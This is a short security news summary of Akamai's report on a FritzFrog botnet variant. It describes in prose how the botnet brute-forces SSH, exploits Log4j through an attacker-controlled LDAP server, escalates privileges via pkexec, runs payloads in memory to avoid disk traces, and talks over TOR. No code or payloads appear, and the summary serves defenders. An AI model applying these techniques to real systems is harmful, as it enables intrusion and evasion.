On February 1, 2024, Akamai Security Intelligence Group (SIG) reported that a variant of the FritzFrog botnet has been observed actively exploiting "Log4j" (CVE-2021-44228) in the attack chain. This threat stream targets unpatched instances which may be still many across various organizations.
Akamai's analysis highlights that FritzFrog botnet expanded its capabilities by introducing new features:
FritzFrog carries out SSH brute-force attacks exploiting weak credentials for initial intrusion. The malware has a variety of modules configured to target a large set of Java applications. These include a specific module enabling exploitation of Log4j against vulnerable instances. The malware seeks for HTTP servers over ports 8080, 8090, 8888 and 9000. Then FritzFrog triggers the vulnerability by logging a payload which, in turn, forces the Java application to connect to an attacker-determined LDAP server, from which the malicious Java class is downloaded and executed.
Notably, a separate module targets CVE-2021-4034, a local privilege escalation in polkit's pkexec utility.
Ability to kill competing malware.
FritzFrog implemented a number of measures that reduce the attack footprint, including preventing files from being dropped to the local drive. The malware leverages /dev/shm and memfd_create to execute the payload in the RAM without writing files to the local drive.
Network communication over TOR.